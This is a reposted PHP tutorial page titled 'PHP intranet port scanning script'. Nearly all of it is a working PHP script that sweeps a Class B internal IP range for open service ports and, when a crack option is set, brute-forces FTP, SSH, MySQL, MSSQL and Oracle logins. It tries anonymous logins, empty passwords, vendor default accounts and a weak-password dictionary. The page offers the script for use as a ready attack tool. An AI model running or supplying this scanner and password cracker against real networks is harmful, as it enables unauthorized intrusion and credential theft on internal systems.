Home  >  Article  >  php教程  >  PHP内网端口扫描脚本

PHP内网端口扫描脚本

WBOY
WBOYOriginal
2016-06-06 20:09:414329browse

转载: 可以扫描B段IP外加根据字典破解一些服务的密码,比如FTP,SSH,MySQL,MSSQL,Oracle之类,会自动尝试空密码和弱密码,比如ftp的匿名登录,mssql的sa空密码,oracle的默认密码之类。 因为php超时原因 建议扫描50ip左右 ?php#Class B PHP port scanner by

转载:

可以扫描B段IP外加根据字典破解一些服务的密码,比如FTP,SSH,MySQL,MSSQL,Oracle之类,会自动尝试空密码和弱密码,比如ftp的匿名登录,mssql的sa空密码,oracle的默认密码之类。

因为php超时原因 建议扫描50ip左右 

PHP内网端口扫描脚本

<?php #Class B PHP port scanner by anthrax @ insight-labs.org
session_start();
set_time_limit(0);
ob_implicit_flush(True);
ob_end_flush();
function check_port($ip,$port,$timeout=0.1) {
 $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
 if ($conn) {
 fclose($conn);
 return true;
 }
}
function crackpwd($addr,$port,$userlist,$passlist,$type){
switch($type){
case 'ftp':
$ftp=@ftp_connect($addr,$port);
if(@ftp_login($ftp,'anonymous','safasf#asfs.com')){
echo "$addr".':'.$port.' Anonymous Login enabled'.'';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@ftp_login($ftp,$username,$pass)){
echo "FTP $addr".':'.$port.'Username: '.$username.' pwd: '.$pass.'';
}
}
}
ftp_close($ftp);
break;
case 'mysql':
if(@mysql_connect($addr.':'.$port, 'root', '')){
echo 'MySQL Username: root EMPTY PASSWORD';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@mysql_connect($addr.':'.$port, $username, $pass)){
echo 'MySQL Username: '.$username.' pwd: '.$pass.'';
}
}
}
break;
case 'mssql':
if(@mssql_connect($addr,'sa','')){
echo 'MSSQL Username: sa EMPTY PASSWORD';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@mssql_connect($addr, $username, $pass)){
echo 'MSSQL Username: '.$username.' pwd: '.$pass.'';
}
}
}
break;
case 'oracle':
if(@oci_connect('SCOTT','TIGER',$addr)){
echo 'Oracle Username SCOTT pwd: TIGER';
}
if(@oci_connect('SYSTEM','MANAGER',$addr)){
echo 'Oracle Username SYSTEM pwd: MANAGER';
}
if(@oci_connect('DBSNMP','DBSNMP',$addr)){
echo 'Oracle Username DBSNMP pwd: DBSNMP';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@oci_connect($username,$pass,$addr)){
echo 'Oracle Username: '.$username.' pwd: '.$pass.'';
}
}
}
break;
case 'ssh':
$ssh=@ssh2_connect($addr,'22');
foreach($userlist as $username){
foreach($passlist as $pass){
if(@ssh2_auth_password($ssh,$username,$pass)){
echo 'SSH Username: '.$username.' pwd: '.$pass.'';
}
}
}
break;
}
}
function scanip($ip,$timeout){
$portarr=array(
'21'=>'FTP',
'22'=>'SSH',
'23'=>'Telnet',
'25'=>'SMTP',
'79'=>'Finger',
'80'=>'HTTP',
'81'=>'HTTP/Proxy',
'110'=>'POP3',
'135'=>'MS Netbios',
'139'=>'MS Netbios',
'143'=>'IMAP',
'162'=>'SNMP',
'389'=>'LDAP',
'443'=>'HTTPS',
'445'=>'MS SMB',
'873'=>'rsync',
'1080'=>'Proxy/HTTP Server',
'1433'=>'MS SQL Server',
'2433'=>'MS SQL Server Hidden',
'1521'=>'Oracle DB Server',
'1522'=>'Oracle DB Server',
'3128'=>'Squid Cache Server',
'3129'=>'Squid Cache Server',
'3306'=>'MySQL Server',
'3307'=>'MySQL Server',
'3500'=>'Squid Cache Server',
'3389'=>'MS Terminal Service',
'5800'=>'VNC Server',
'5900'=>'VNC Server',
'8080'=>'Proxy/HTTP Server',
'10000'=>'Webmin',
'11211'=>'Memcached'
);
foreach($portarr as $port=>$name){
if(check_port($ip,$port,$timeout=0.1)==True){
echo 'Port: '.$port.' '.$name.' is open';
@ob_flush();
@flush();
if(isset($_SESSION['crack'])||$_SESSION['crack']==true){
switch($port){
case '21':
$type='ftp';
break;
case '22':
$type='ssh';
break;
case '1433':
$type='mssql';
break;
case '1521':
case '1522':
$type='oracle';
break;
case '3306':
case '3307':
$type='mysql';
break;
default:
$type=false;
}
if($type){
global $userarr,$passarr;
crackpwd($ip,$port,$userarr,$passarr,$type);
@ob_flush();
@flush();
}
}//if
}
}
}
if(!isset($_SESSION['startip'])){
$_SESSION['startip']='Start IP';
$_SESSION['endip']='End IP';
$_SESSION['username']='root
admin';
$_SESSION['password']='123456
root
123123
admin
qwerty';
}
echo '
Timeout
Auto Crack Password on MSSQL,MYSQL,Oracle,SSH,FTP
'.$_SESSION['username'].'
'.$_SESSION['password'].'
Scan
';
if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['timeout'])){
if(isset($_POST['crack'])){
global $userarr,$passarr;
$_SESSION['crack']=true;
$userarr=array_unique(explode("\n",str_replace("\r", "", $_POST['username'])));
$passarr=array_unique (explode("\n",str_replace("\r", "", $_POST['password'])));
$_SESSION['username']=$_POST['username'];
$_SESSION['password']=$_POST['password'];
}
$startip=$_POST['startip'];
$endip=$_POST['endip'];
$timeout=$_POST['timeout'];
$siparr=explode('.',$startip);
$eiparr=explode('.',$endip);
$ciparr=$siparr;
if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
exit('IP error: Wrong IP address or Trying to scan class A address');
}
$_SESSION['startip']=$startip;
$_SESSION['endip']=$endip;
if($startip==$endip){
echo 'Scanning IP '.$startip.'';
@ob_flush();
@flush();
scanip($startip,$timeout);
@ob_flush();
@flush();
exit();
}
if($eiparr[3]!=255){
$eiparr[3]+=1;
}
while($ciparr!=$eiparr){
$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
echo 'Scanning IP '.$ip.'';
@ob_flush();
@flush();
scanip($ip,$timeout);
$ciparr[3]+=1;
if($ciparr[3]>255){
$ciparr[2]+=1;
$ciparr[3]=0;
}
if($ciparr[2]>255){
$ciparr[1]+=1;
$ciparr[2]=0;
}
}
}else{
exit('Missing input');
}
?>

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn